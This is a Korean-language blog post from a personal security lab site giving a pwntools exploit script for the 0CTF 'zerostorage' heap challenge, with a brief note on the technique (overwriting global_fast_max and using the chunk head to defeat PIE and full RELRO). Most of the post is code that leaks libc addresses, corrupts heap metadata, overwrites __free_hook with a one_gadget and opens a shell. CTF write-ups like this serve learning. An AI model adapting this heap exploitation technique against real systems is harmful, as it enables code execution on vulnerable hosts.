cdor1's lab
0ctf zerostorage 본문
※ 방법론을 적어놓은 익스플로잇 코드입니다.
후기 : global_fast_max를 덮고 chunk head를 사용하여 익스플로잇을 진행하는데,
pie, full relro등이 걸려있을때 한번쯤 시도해볼만한 방법인 것 같다.
from pwn import *
s = remote('localhost', 4000)
def insert(data):
print s.recvuntil('choice: ')
s.sendline('1')
print s.recvuntil('Length of new entry: ')
s.sendline(str(len(data)+1))
print s.recvuntil('Enter your data: ')
s.sendline(data)
def update(id, data):
print s.recvuntil('choice: ')
s.sendline('2')
print s.recvuntil('Entry ID: ')
s.sendline(str(id))
print s.recvuntil('Length of entry: ')
s.sendline(len(str(data)))
print s.recvuntil('Enter your data: ')
s.sendline(data)
def merge(id1, id2):
print s.recvuntil('choice: ')
s.sendline('3')
print s.recvuntil('Merge from Entry ID: ')
s.sendline(str(id1))
print s.recvuntil('Merge to Entry ID: ')
s.sendline(str(id2))
def delete(id):
print s.recvuntil('Your choice: ')
s.sendline('4')
print s.recvuntil('Entry ID: ')
s.sendline(str(id))
def view(id):
print s.recvuntil('Your choice: ')
s.sendline('5')
print s.recvuntil('Entry ID: ')
s.sendline(str(id))
insert('A'*8)
insert('B'*8)
insert('C'*8)
insert('D'*8)
insert('E'*8)
insert('F'*8)
insert('G'*8)
delete(0)
merge(2,2)
view(0)
print s.recvuntil('Entry No.0:\n')
heap_leak = u64(s.recv(8))
leak = u64(s.recv(8))
base = leak - 0x3be7b8
one_shot = base + 0x4647c
free_hook = base + 0x3C0B40
global_fast_max = base + int(raw_input())
head = base + int(raw_input())
log.info('heap_leak : ' + hex(heap_leak))
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('one_shot : ' + hex(one_shot))
log.info('global_fast_max : ' + hex(global_fast_max))
log.info('head : ' + hex(head))
insert('H'*8)
update(0, 'A'*8 + p64(global_fast_max - 0x10))
insert('X'*8)
merge(4,4)
update(8, p64(head))
insert('X'*8)
insert('P'*106)
view(9)
print s.recvuntil('Entry No.9:\n')
print s.recv(0x60)
xor = u64(s.recv(8))
rand = xor^head
log.info('xor : ' + hex(xor))
log.info('rand : ' + hex(rand))
update(9, 'A'*8 + p64(1) + p64(0x8) + p64(rand^free_hook))
update(6, p64(one_shot))
delete(6)
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| pwnable.tw hacknote (0) | 2017.01.26 |
|---|---|
| Codegate2016 발표준비 (0) | 2017.01.25 |
| H3X0R CTF be_rich (0) | 2017.01.24 |
| pwnable.tw start (0) | 2017.01.24 |
| YISF 2016 pwn200 (0) | 2017.01.21 |
Comments